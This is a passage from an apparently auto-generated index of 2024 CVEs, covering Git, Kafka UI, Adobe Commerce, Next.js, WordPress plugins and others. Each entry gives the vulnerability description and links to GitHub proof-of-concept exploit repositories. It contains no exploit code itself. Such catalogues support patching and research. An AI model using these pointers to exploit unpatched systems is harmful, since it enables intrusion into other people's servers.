[tobelight/cve_2024_32002](https://github.com/tobelight/cve_2024_32002) +- [Basyaact/CVE-2024-32002-PoC_Chinese](https://github.com/Basyaact/CVE-2024-32002-PoC_Chinese) +- [EQSTLab/git_rce](https://github.com/EQSTLab/git_rce) +- [sysonlai/CVE-2024-32002-hook](https://github.com/sysonlai/CVE-2024-32002-hook) +- [TSY244/CVE-2024-32002-git-rce-father-poc](https://github.com/TSY244/CVE-2024-32002-git-rce-father-poc) +- [TSY244/CVE-2024-32002-git-rce](https://github.com/TSY244/CVE-2024-32002-git-rce) +- [blackninja23/CVE-2024-32002](https://github.com/blackninja23/CVE-2024-32002) +- [daemon-reconfig/CVE-2024-32002](https://github.com/daemon-reconfig/CVE-2024-32002) +- [charlesgargasson/CVE-2024-32002](https://github.com/charlesgargasson/CVE-2024-32002) +- [NishanthAnand21/CVE-2024-32002-PoC](https://github.com/NishanthAnand21/CVE-2024-32002-PoC) +- [FlojBoj/CVE-2024-32002](https://github.com/FlojBoj/CVE-2024-32002) +- [SpycioKon/CVE-2024-32002](https://github.com/SpycioKon/CVE-2024-32002) +- [chrisWalker11/running-CVE-2024-32002-locally-for-tesing](https://github.com/chrisWalker11/running-CVE-2024-32002-locally-for-tesing) +- [sanan2004/CVE-2024-32002](https://github.com/sanan2004/CVE-2024-32002) +- [Masamuneee/hook](https://github.com/Masamuneee/hook) +- [Masamuneee/CVE-2024-32002-POC](https://github.com/Masamuneee/CVE-2024-32002-POC) +- [th4s1s/CVE-2024-32002-PoC](https://github.com/th4s1s/CVE-2024-32002-PoC) +- [Julian-gmz/hook_CVE-2024-32002](https://github.com/Julian-gmz/hook_CVE-2024-32002) +- [grecosamuel/CVE-2024-32002](https://github.com/grecosamuel/CVE-2024-32002) +- [XiaomingX/cve-2024-32002-poc](https://github.com/XiaomingX/cve-2024-32002-poc) +- [jolibb55/donald](https://github.com/jolibb55/donald) + +### CVE-2024-32004 (2024-05-14) + +Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, an attacker can prepare a local repository in such a way that, when cloned, will execute arbitrary code during the operation. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid cloning repositories from untrusted sources. + + +- [Wadewfsssss/CVE-2024-32004](https://github.com/Wadewfsssss/CVE-2024-32004) +- [10cks/CVE-2024-32004-POC](https://github.com/10cks/CVE-2024-32004-POC) + +### CVE-2024-32030 (2024-06-19) + +Kafka UI is an Open-Source Web UI for Apache Kafka Management. Kafka UI API allows users to connect to different Kafka brokers by specifying their network address and port. As a separate feature, it also provides the ability to monitor the performance of Kafka brokers by connecting to their JMX ports. JMX is based on the RMI protocol, so it is inherently susceptible to deserialization attacks. A potential attacker can exploit this feature by connecting Kafka UI backend to its own malicious broker. This vulnerability affects the deployments where one of the following occurs: 1. dynamic.config.enabled property is set in settings. It's not enabled by default, but it's suggested to be enabled in many tutorials for Kafka UI, including its own README.md. OR 2. an attacker has access to the Kafka cluster that is being connected to Kafka UI. In this scenario the attacker can exploit this vulnerability to expand their access and execute code on Kafka UI as well. Instead of setting up a legitimate JMX port, an attacker can create an RMI listener that returns a malicious serialized object for any RMI call. In the worst case it could lead to remote code execution as Kafka UI has the required gadget chains in its classpath. This issue may lead to post-auth remote code execution. This is particularly dangerous as Kafka-UI does not have authentication enabled by default. This issue has been addressed in version 0.7.2. All users are advised to upgrade. There are no known workarounds for this vulnerability. These issues were discovered and reported by the GitHub Security lab and is also tracked as GHSL-2023-230. + + +- [huseyinstif/CVE-2024-32030-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-32030-Nuclei-Template) + +### CVE-2024-32104 (2024-04-15) + +Cross-Site Request Forgery (CSRF) vulnerability in XLPlugins NextMove Lite.This issue affects NextMove Lite: from n/a through 2.18.1.\n\n + + +- [Cerberus-HiproPlus/CVE-2024-32104](https://github.com/Cerberus-HiproPlus/CVE-2024-32104) + +### CVE-2024-32113 (2024-05-08) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13.\n\nUsers are recommended to upgrade to version 18.12.13, which fixes the issue.\n\n + + +- [RacerZ-fighting/CVE-2024-32113-POC](https://github.com/RacerZ-fighting/CVE-2024-32113-POC) +- [Mr-xn/CVE-2024-32113](https://github.com/Mr-xn/CVE-2024-32113) +- [YongYe-Security/CVE-2024-32113](https://github.com/YongYe-Security/CVE-2024-32113) +- [MikeyPPPPPPPP/CVE-2024-32113](https://github.com/MikeyPPPPPPPP/CVE-2024-32113) + +### CVE-2024-32136 (2024-04-15) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Xenioushk BWL Advanced FAQ Manager.This issue affects BWL Advanced FAQ Manager: from n/a through 2.0.3.\n\n + + +- [xbz0n/CVE-2024-32136](https://github.com/xbz0n/CVE-2024-32136) + +### CVE-2024-32205 +- [Lucky-lm/CVE-2024-32205](https://github.com/Lucky-lm/CVE-2024-32205) + +### CVE-2024-32238 (2024-04-22) + +H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface. + + +- [asdfjkl11/CVE-2024-32238](https://github.com/asdfjkl11/CVE-2024-32238) +- [FuBoLuSec/CVE-2024-32238](https://github.com/FuBoLuSec/CVE-2024-32238) + +### CVE-2024-32258 (2024-04-23) + +The network server of fceux 2.7.0 has a path traversal vulnerability, allowing attackers to overwrite any files on the server without authentication by fake ROM. + + +- [liyansong2018/CVE-2024-32258](https://github.com/liyansong2018/CVE-2024-32258) + +### CVE-2024-32369 (2024-05-07) + +SQL Injection vulnerability in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the start and limit parameter in the mliWhiteList.php component. + + +- [chucrutis/CVE-2024-32369](https://github.com/chucrutis/CVE-2024-32369) + +### CVE-2024-32370 (2024-05-07) + +An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the id parameter in the mliSystemUsers.php component. + + +- [chucrutis/CVE-2024-32370](https://github.com/chucrutis/CVE-2024-32370) + +### CVE-2024-32371 (2024-05-07) + +An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a regular user account to escalate their privileges and gain administrative access by changing the type parameter from 1 to 0. + + +- [chucrutis/CVE-2024-32371](https://github.com/chucrutis/CVE-2024-32371) + +### CVE-2024-32399 (2024-04-22) + +Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component. + + +- [NN0b0dy/CVE-2024-32399](https://github.com/NN0b0dy/CVE-2024-32399) + +### CVE-2024-32459 (2024-04-22) + +FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients and servers that use a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to out-of-bounds read. Versions 3.5.0 and 2.11.6 patch the issue. No known workarounds are available. + + +- [absholi7ly/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-](https://github.com/absholi7ly/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-) + +### CVE-2024-32523 (2024-05-17) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in EverPress Mailster allows PHP Local File Inclusion.This issue affects Mailster: from n/a through 4.0.6. + + +- [truonghuuphuc/CVE-2024-32523-Poc](https://github.com/truonghuuphuc/CVE-2024-32523-Poc) + +### CVE-2024-32640 +- [Stuub/CVE-2024-32640-SQLI-MuraCMS](https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS) +- [0xYumeko/CVE-2024-32640-SQLI-MuraCMS](https://github.com/0xYumeko/CVE-2024-32640-SQLI-MuraCMS) +- [sammings/CVE-2024-32640](https://github.com/sammings/CVE-2024-32640) +- [pizza-power/CVE-2024-32640](https://github.com/pizza-power/CVE-2024-32640) + +### CVE-2024-32651 (2024-04-25) + +changedetection.io is an open source web page change detection, website watcher, restock monitor and notification service. There is a Server Side Template Injection (SSTI) in Jinja2 that allows Remote Command Execution on the server host. Attackers can run any system command without any restriction and they could use a reverse shell. The impact is critical as the attacker can completely takeover the server machine. This can be reduced if changedetection is behind a login page, but this isn't required by the application (not by default and not enforced). + + +- [zcrosman/cve-2024-32651](https://github.com/zcrosman/cve-2024-32651) +- [s0ck3t-s3c/CVE-2024-32651-changedetection-RCE](https://github.com/s0ck3t-s3c/CVE-2024-32651-changedetection-RCE) + +### CVE-2024-32700 (2024-05-13) + +Unrestricted Upload of File with Dangerous Type vulnerability in Kognetiks Kognetiks Chatbot for WordPress.This issue affects Kognetiks Chatbot for WordPress: from n/a through 2.0.0. + + +- [nastar-id/CVE-2024-32700](https://github.com/nastar-id/CVE-2024-32700) + +### CVE-2024-32709 (2024-04-24) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Plechev Andrey WP-Recall.This issue affects WP-Recall: from n/a through 16.26.5.\n\n + + +- [truonghuuphuc/CVE-2024-32709-Poc](https://github.com/truonghuuphuc/CVE-2024-32709-Poc) + +### CVE-2024-33111 (2024-05-06) + +D-Link DIR-845L router <=v1.01KRb03 is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php. + + +- [FaLLenSKiLL1/CVE-2024-33111](https://github.com/FaLLenSKiLL1/CVE-2024-33111) + +### CVE-2024-33113 (2024-05-06) + +D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php. + + +- [FaLLenSKiLL1/CVE-2024-33113](https://github.com/FaLLenSKiLL1/CVE-2024-33113) +- [tekua/CVE-2024-33113](https://github.com/tekua/CVE-2024-33113) + +### CVE-2024-33209 (2024-10-02) + +FlatPress v1.3 is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript code into the "Add New Entry" section, which allows them to execute arbitrary code in the context of a victim's web browser. + + +- [paragbagul111/CVE-2024-33209](https://github.com/paragbagul111/CVE-2024-33209) + +### CVE-2024-33210 (2024-10-02) + +A cross-site scripting (XSS) vulnerability has been identified in Flatpress 1.3. This vulnerability allows an attacker to inject malicious scripts into web pages viewed by other users. + + +- [paragbagul111/CVE-2024-33210](https://github.com/paragbagul111/CVE-2024-33210) + +### CVE-2024-33231 (2024-11-18) + +Cross Site Scripting vulnerability in Ferozo Email version 1.1 allows a local attacker to execute arbitrary code via a crafted payload to the PDF preview component. + + +- [fdzdev/CVE-2024-33231](https://github.com/fdzdev/CVE-2024-33231) + +### CVE-2024-33352 +- [mmiszczyk/CVE-2024-33352](https://github.com/mmiszczyk/CVE-2024-33352) + +### CVE-2024-33453 (2024-10-17) + +Buffer Overflow vulnerability in esp-idf v.5.1 allows a remote attacker to obtain sensitive information via the externalId component. + + +- [Ant1sec-ops/CVE-2024-33453](https://github.com/Ant1sec-ops/CVE-2024-33453) + +### CVE-2024-33559 (2024-04-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 8theme XStore allows SQL Injection.This issue affects XStore: from n/a through 9.3.5.\n\n + + +- [absholi7ly/WordPress-XStore-theme-SQL-Injection](https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection) + +### CVE-2024-33644 (2024-05-17) + +Improper Control of Generation of Code ('Code Injection') vulnerability in WPCustomify Customify Site Library allows Code Injection.This issue affects Customify Site Library: from n/a through 0.0.9. + + +- [Akshath-Nagulapally/ReproducingCVEs_Akshath_Nagulapally](https://github.com/Akshath-Nagulapally/ReproducingCVEs_Akshath_Nagulapally) + +### CVE-2024-33722 +- [fuzzlove/soplanning-1.52-exploits](https://github.com/fuzzlove/soplanning-1.52-exploits) + +### CVE-2024-33775 (2024-05-01) + +An issue with the Autodiscover component in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted Dashlet. + + +- [Neo-XeD/CVE-2024-33775](https://github.com/Neo-XeD/CVE-2024-33775) + +### CVE-2024-33883 (2024-04-28) + +The ejs (aka Embedded JavaScript templates) package before 3.1.10 for Node.js lacks certain pollution protection. + + +- [Grantzile/PoC-CVE-2024-33883](https://github.com/Grantzile/PoC-CVE-2024-33883) + +### CVE-2024-33901 (-) + +Issue in KeePassXC 2.7.7 allows an attacker (who has the privileges of the victim) to recover some passwords stored in the .kdbx database via a memory dump. NOTE: the vendor disputes this because memory-management constraints make this unavoidable in the current design and other realistic designs. + + +- [gmikisilva/CVE-2024-33901-ProofOfConcept](https://github.com/gmikisilva/CVE-2024-33901-ProofOfConcept) + +### CVE-2024-33911 (2024-05-02) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Weblizar School Management Pro.This issue affects School Management Pro: from n/a through 10.3.4.\n\n + + +- [xbz0n/CVE-2024-33911](https://github.com/xbz0n/CVE-2024-33911) + +### CVE-2024-34102 (2024-06-13) + +Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction. + + +- [ArturArz1/TestCVE-2024-34102](https://github.com/ArturArz1/TestCVE-2024-34102) +- [th3gokul/CVE-2024-34102](https://github.com/th3gokul/CVE-2024-34102) +- [bigb0x/CVE-2024-34102](https://github.com/bigb0x/CVE-2024-34102) +- [11whoami99/CVE-2024-34102](https://github.com/11whoami99/CVE-2024-34102) +- [d0rb/CVE-2024-34102](https://github.com/d0rb/CVE-2024-34102) +- [Chocapikk/CVE-2024-34102](https://github.com/Chocapikk/CVE-2024-34102) +- [0x0d3ad/CVE-2024-34102](https://github.com/0x0d3ad/CVE-2024-34102) +- [cmsec423/CVE-2024-34102](https://github.com/cmsec423/CVE-2024-34102) +- [cmsec423/Magento-XXE-CVE-2024-34102](https://github.com/cmsec423/Magento-XXE-CVE-2024-34102) +- [jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento](https://github.com/jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento) +- [SamJUK/cosmicsting-validator](https://github.com/SamJUK/cosmicsting-validator) +- [unknownzerobit/poc](https://github.com/unknownzerobit/poc) +- [crynomore/CVE-2024-34102](https://github.com/crynomore/CVE-2024-34102) +- [bughuntar/CVE-2024-34102](https://github.com/bughuntar/CVE-2024-34102) +- [bughuntar/CVE-2024-34102-Python](https://github.com/bughuntar/CVE-2024-34102-Python) +- [Phantom-IN/CVE-2024-34102](https://github.com/Phantom-IN/CVE-2024-34102) +- [wubinworks/magento2-cosmic-sting-patch](https://github.com/wubinworks/magento2-cosmic-sting-patch) +- [EQSTLab/CVE-2024-34102](https://github.com/EQSTLab/CVE-2024-34102) +- [dream434/CVE-2024-34102](https://github.com/dream434/CVE-2024-34102) +- [bka/magento-cve-2024-34102-exploit-cosmicstring](https://github.com/bka/magento-cve-2024-34102-exploit-cosmicstring) +- [wubinworks/magento2-encryption-key-manager-cli](https://github.com/wubinworks/magento2-encryption-key-manager-cli) +- [mksundaram69/CVE-2024-34102](https://github.com/mksundaram69/CVE-2024-34102) + +### CVE-2024-34144 (2024-05-02) + +A sandbox bypass vulnerability involving crafted constructor bodies in Jenkins Script Security Plugin 1335.vf07d9ce377a_e and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM. + + +- [MXWXZ/CVE-2024-34144](https://github.com/MXWXZ/CVE-2024-34144) + +### CVE-2024-34220 (-) + +Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the 'leave' parameter. + + +- [dovankha/CVE-2024-34220](https://github.com/dovankha/CVE-2024-34220) + +### CVE-2024-34221 (-) + +Sourcecodester Human Resource Management System 1.0 is vulnerable to Insecure Permissions resulting in privilege escalation. + + +- [dovankha/CVE-2024-34221](https://github.com/dovankha/CVE-2024-34221) + +### CVE-2024-34222 (-) + +Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the searccountry parameter. + + +- [dovankha/CVE-2024-34222](https://github.com/dovankha/CVE-2024-34222) + +### CVE-2024-34223 (-) + +Insecure permission vulnerability in /hrm/leaverequest.php in SourceCodester Human Resource Management System 1.0 allow attackers to approve or reject leave ticket. + + +- [dovankha/CVE-2024-34223](https://github.com/dovankha/CVE-2024-34223) + +### CVE-2024-34224 (-) + +Cross Site Scripting vulnerability in /php-lms/classes/Users.php?f=save in Computer Laboratory Management System using PHP and MySQL 1.0 allow remote attackers to inject arbitrary web script or HTML via the firstname, middlename, lastname parameters. + + +- [dovankha/CVE-2024-34224](https://github.com/dovankha/CVE-2024-34224) + +### CVE-2024-34225 (-) + +Cross Site Scripting vulnerability in php-lms/admin/?page=system_info in Computer Laboratory Management System using PHP and MySQL 1.0 allow remote attackers to inject arbitrary web script or HTML via the name, shortname parameters. + + +- [dovankha/CVE-2024-34225](https://github.com/dovankha/CVE-2024-34225) + +### CVE-2024-34226 (-) + +SQL injection vulnerability in /php-sqlite-vms/?page=manage_visitor&id=1 in SourceCodester Visitor Management System 1.0 allow attackers to execute arbitrary SQL commands via the id parameters. + + +- [dovankha/CVE-2024-34226](https://github.com/dovankha/CVE-2024-34226) + +### CVE-2024-34310 (-) + +Jin Fang Times Content Management System v3.2.3 was discovered to contain a SQL injection vulnerability via the id parameter. + + +- [3309899621/CVE-2024-34310](https://github.com/3309899621/CVE-2024-34310) + +### CVE-2024-34312 (2024-06-24) + +Virtual Programming Lab for Moodle up to v4.2.3 was discovered to contain a cross-site scripting (XSS) vulnerability via the component vplide.js. + + +- [vincentscode/CVE-2024-34312](https://github.com/vincentscode/CVE-2024-34312) + +### CVE-2024-34313 (2024-06-24) + +An issue in VPL Jail System up to v4.0.2 allows attackers to execute a directory traversal via a crafted request to a public endpoint. + + +- [vincentscode/CVE-2024-34313](https://github.com/vincentscode/CVE-2024-34313) + +### CVE-2024-34329 (2024-07-22) + +Insecure permissions in Entrust Datacard XPS Card Printer Driver 8.4 and earlier allows unauthenticated attackers to execute arbitrary code as SYSTEM via a crafted DLL payload. + + +- [pamoutaf/CVE-2024-34329](https://github.com/pamoutaf/CVE-2024-34329) + +### CVE-2024-34350 (2024-05-09) + +Next.js is a React framework that can provide building blocks to create web applications. Prior to 13.5.1, an inconsistent interpretation of a crafted HTTP request meant that requests are treated as both a single request, and two separate requests by Next.js, leading to desynchronized responses. This led to a response queue poisoning vulnerability in the affected Next.js versions. For a request to be exploitable, the affected route also had to be making use of the [rewrites](https://nextjs.org/docs/app/api-reference/next-config-js/rewrites) feature in Next.js. The vulnerability is resolved in Next.js `13.5.1` and newer. + + +- [Sudistark/rewrites-nextjs-CVE-2024-34350](https://github.com/Sudistark/rewrites-nextjs-CVE-2024-34350) + +### CVE-2024-34351 (2024-05-09) + +Next.js is a React framework that can provide building blocks to create web applications. A Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. The required conditions are 1) Next.js is running in a self-hosted manner; 2) the Next.js application makes use of Server Actions; and 3) the Server Action performs a redirect to a relative path which starts with a `/`. This vulnerability was fixed in Next.js `14.1.1`. + + +- [Voorivex/CVE-2024-34351](https://github.com/Voorivex/CVE-2024-34351) +- [avergnaud/Next.js_exploit_CVE-2024-34351](https://github.com/avergnaud/Next.js_exploit_CVE-2024-34351) +- [God4n/nextjs-CVE-2024-34351-_exploit](https://github.com/God4n/nextjs-CVE-2024-34351-_exploit) + +### CVE-2024-34361 (2024-07-05) + +Pi-hole is a DNS sinkhole that protects devices from unwanted content without installing any client-side software. A vulnerability in versions prior to 5.18.3 allows an authenticated user to make internal requests to the server via the `gravity_DownloadBlocklistFromUrl()` function. Depending on some circumstances, the vulnerability could lead to remote command execution. Version 5.18.3 contains a patch for this issue. + + +- [T0X1Cx/CVE-2024-34361-PiHole-SSRF-to-RCE](https://github.com/T0X1Cx/CVE-2024-34361-PiHole-SSRF-to-RCE) + +### CVE-2024-34452 (2024-06-21) + +CMSimple_XH 1.7.6 allows XSS by uploading a crafted SVG document. + + +- [surajhacx/CVE-2024-34452](https://github.com/surajhacx/CVE-2024-34452) + +### CVE-2024-34463 (2024-09-03) + +BPL Personal Weighing Scale PWS-01BT IND/09/18/599 devices send sensitive information in unencrypted BLE packets. (The packet data also lacks authentication and integrity protection.) + + +- [yash-chandna/CVE-2024-34463](https://github.com/yash-chandna/CVE-2024-34463) + +### CVE-2024-34469 (2024-05-04) + +Rukovoditel before 3.5.3 allows XSS via user_photo to index.php?module=users/registration&action=save. + + +- [Toxich4/CVE-2024-34469](https://github.com/Toxich4/CVE-2024-34469) + +### CVE-2024-34470 (2024-05-06) + +An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server. + + +- [osvaldotenorio/CVE-2024-34470](https://github.com/osvaldotenorio/CVE-2024-34470) +- [bigb0x/CVE-2024-34470](https://github.com/bigb0x/CVE-2024-34470) +- [Cappricio-Securities/CVE-2024-34470](https://github.com/Cappricio-Securities/CVE-2024-34470) +- [Mr-r00t11/CVE-2024-34470](https://github.com/Mr-r00t11/CVE-2024-34470) +- [th3gokul/CVE-2024-34470](https://github.com/th3gokul/CVE-2024-34470) + +### CVE-2024-34471 (2024-05-06) + +An issue was discovered in HSC Mailinspector 5.2.17-3. A Path Traversal vulnerability (resulting in file deletion) exists in the mliRealtimeEmails.php file. The filename parameter in the export HTML functionality does not properly validate the file location, allowing an attacker to read and delete arbitrary files on the server. This was observed when the mliRealtimeEmails.php file itself was read and subsequently deleted, resulting in a 404 error for the file and disruption of email information loading. + + +- [osvaldotenorio/CVE-2024-34471](https://github.com/osvaldotenorio/CVE-2024-34471) + +### CVE-2024-34472 (2024-05-06) + +An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An authenticated blind SQL injection vulnerability exists in the mliRealtimeEmails.php file. The ordemGrid parameter in a POST request to /mailinspector/mliRealtimeEmails.php does not properly sanitize input, allowing an authenticated attacker to execute arbitrary SQL commands, leading to the potential disclosure of the entire application database. + + +- [osvaldotenorio/CVE-2024-34472](https://github.com/osvaldotenorio/CVE-2024-34472) + +### CVE-2024-34474 (2024-05-05) + +Clario through 2024-04-11 for Desktop has weak permissions for %PROGRAMDATA%\Clario and tries to load DLLs from there as SYSTEM. + + +- [Alaatk/CVE-2024-34474](https://github.com/Alaatk/CVE-2024-34474) + +### CVE-2024-34582 (-) + +Sunhillo SureLine through 8.10.0 on RICI 5000 devices allows cgi/usrPasswd.cgi userid_change XSS within the Forgot Password feature. + + +- [silent6trinity/CVE-2024-34582](https://github.com/silent6trinity/CVE-2024-34582) + +### CVE-2024-34693 (2024-06-20) + +Improper Input Validation vulnerability in Apache Superset, allows for an authenticated attacker to create a MariaDB connection with local_infile enabled. If both the MariaDB server (off by default) and the local mysql client on the web server are set to allow for local infile, it's possible for the attacker to execute a specific MySQL/MariaDB SQL command that is able to read files from the server and insert their content on a MariaDB database table.This issue affects Apache Superset: before 3.1.3 and version 4.0.0\n\nUsers are recommended to upgrade to version 4.0.1 or 3.1.3, which fixes the issue.\n\n + + +- [mbadanoiu/CVE-2024-34693](https://github.com/mbadanoiu/CVE-2024-34693) +- [Mr-r00t11/CVE-2024-34693](https://github.com/Mr-r00t11/CVE-2024-34693) + +### CVE-2024-34716 (2024-05-14) + +PrestaShop is an open source e-commerce web application. A cross-site scripting (XSS) vulnerability that only affects PrestaShops with customer-thread feature flag enabled is present starting from PrestaShop 8.1.0 and prior to PrestaShop 8.1.6. When the customer thread feature flag is enabled through the front-office contact form, a hacker can upload a malicious file containing an XSS that will be executed when an admin opens the attached file in back office. The script injected can access the session and the security token, which allows it to perform any authenticated action in the scope of the administrator's right. This vulnerability is patched in 8.1.6. A workaround is to disable the customer-thread feature-flag. + + +- [aelmokhtar/CVE-2024-34716](https://github.com/aelmokhtar/CVE-2024-34716) +- [0xDTC/Prestashop-CVE-2024-34716](https://github.com/0xDTC/Prestashop-CVE-2024-34716) + +### CVE-2024-34739 (2024-08-15) + +In shouldRestrictOverlayActivities of UsbProfileGroupSettingsManager.java, there is a possible escape from SUW due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. + + +- [uthrasri/CVE-2024-34739](https://github.com/uthrasri/CVE-2024-34739) + +### CVE-2024-34741 (2024-08-15) + +In setForceHideNonSystemOverlayWindowIfNeeded of WindowState.java, there is a possible way for message content to be visible on the screensaver while lock screen visibility settings are restricted by the user due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [uthrasri/CVE-2024-34741](https://github.com/uthrasri/CVE-2024-34741) + +### CVE-2024-34831 (2024-09-10) + +cross-site scripting (XSS) vulnerability in Gibbon Core v26.0.00 allows an attacker to execute arbitrary code via the imageLink parameter in the library_manage_catalog_editProcess.php component. + + +- [enzored/CVE-2024-34831](https://github.com/enzored/CVE-2024-34831) + +### CVE-2024-34833 (2024-06-17) + +Sourcecodester Payroll Management System v1.0 is vulnerable to File Upload. Users can upload images via the "save_settings" page. An unauthenticated attacker can leverage this functionality to upload a malicious PHP file instead. Successful exploitation of this vulnerability results in the ability to execute arbitrary code as the user running the web server. + + +- [ShellUnease/CVE-2024-34833-payroll-management-system-rce](https://github.com/ShellUnease/CVE-2024-34833-payroll-management-system-rce) + +### CVE-2024-34958 (-) + +idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/banner_deal.php?mudi=add + + +- [Gr-1m/CVE-2024-34958](https://github.com/Gr-1m/CVE-2024-34958) + +### CVE-2024-35133 (2024-08-29) + +IBM Security Verify Access 10.0.0 through 10.0.8 OIDC Provider could allow a remote authenticated attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. + + +- [Ozozuz/Ozozuz-IBM-Security-Verify-CVE-2024-35133](https://github.com/Ozozuz/Ozozuz-IBM-Security-Verify-CVE-2024-35133) + +### CVE-2024-35176 (2024-05-16) + + REXML is an XML toolkit for Ruby. The REXML gem before 3.2.6 has a denial of service vulnerability when it parses an XML that has many `<`s in an attribute value. Those who need to parse untrusted XMLs may be impacted to this vulnerability. The REXML gem 3.2.7 or later include the patch to fix this vulnerability. As a workaround, don't parse untrusted XMLs. + + +- [SpiralBL0CK/CVE-2024-35176](https://github.com/SpiralBL0CK/CVE-2024-35176) + +### CVE-2024-35205 (-) + +The WPS Office (aka cn.wps.moffice_eng) application before 17.0.0 for Android fails to properly sanitize file names before processing them through external application interactions, leading to a form of path traversal. This potentially enables any application to dispatch a crafted library file, aiming to overwrite an existing native library utilized by WPS Office. Successful exploitation could result in the execution of arbitrary commands under the guise of WPS Office's application ID. + + +- [cyb3r-w0lf/Dirty_Stream-Android-POC](https://github.com/cyb3r-w0lf/Dirty_Stream-Android-POC) + +### CVE-2024-35242 (2024-06-10) + +Composer is a dependency manager for PHP. On the 2.x branch prior to versions 2.2.24 and 2.7.7, the `composer install` command running inside a git/hg repository which has specially crafted branch names can lead to command injection. This requires cloning untrusted repositories. Patches are available in version 2.2.24 for 2.2 LTS or 2.7.7 for mainline. As a workaround, avoid cloning potentially compromised repositories.\n + + +- [KKkai0315/CVE-2024-35242](https://github.com/KKkai0315/CVE-2024-35242) + +### CVE-2024-35250 (2024-06-11) + +Windows Kernel-Mode Driver Elevation of Privilege Vulnerability + + +- [varwara/CVE-2024-35250](https://github.com/varwara/CVE-2024-35250) +- [ro0tmylove/CVE-2024-35250-BOF](https://github.com/ro0tmylove/CVE-2024-35250-BOF) +- [yinsel/CVE-2024-35250-BOF](https://github.com/yinsel/CVE-2024-35250-BOF) + +### CVE-2024-35286 (2024-10-21) + +A vulnerability in NuPoint Messenger (NPM) of Mitel MiCollab through 9.8.0.33 allows an unauthenticated attacker to conduct a SQL injection attack due to insufficient sanitization of user input. A successful exploit could allow an attacker to access sensitive information and execute arbitrary database and management operations. + + +- [lu4m575/CVE-2024-35286_scan.nse](https://github.com/lu4m575/CVE-2024-35286_scan.nse) + +### CVE-2024-35315 (2024-10-21) + +A vulnerability in the Desktop Client of Mitel MiCollab through 9.7.1.110, and MiVoice Business Solution Virtual Instance (MiVB SVI) 1.0.0.25, could allow an authenticated attacker to conduct a privilege escalation attack due to improper file validation. A successful exploit could allow an attacker to run arbitrary code with elevated privileges. + + +- [ewilded/CVE-2024-35315-POC](https://github.com/ewilded/CVE-2024-35315-POC) + +### CVE-2024-35333 (-) + +A stack-buffer-overflow vulnerability exists in the read_charset_decl function of html2xhtml 1.3. This vulnerability occurs due to improper bounds checking when copying data into a fixed-size stack buffer. An attacker can exploit this vulnerability by providing a specially crafted input to the vulnerable function, causing a buffer overflow and potentially leading to arbitrary code execution, denial of service, or data corruption. + + +- [momo1239/CVE-2024-35333](https://github.com/momo1239/CVE-2024-35333) + +### CVE-2024-35468 (-) + +A SQL injection vulnerability in /hrm/index.php in SourceCodester Human Resource Management System 1.0 allows attackers to execute arbitrary SQL commands via the password parameter. + + +- [dovankha/CVE-2024-35468](https://github.com/dovankha/CVE-2024-35468) + +### CVE-2024-35469 (-) + +A SQL injection vulnerability in /hrm/user/ in SourceCodester Human Resource Management System 1.0 allows attackers to execute 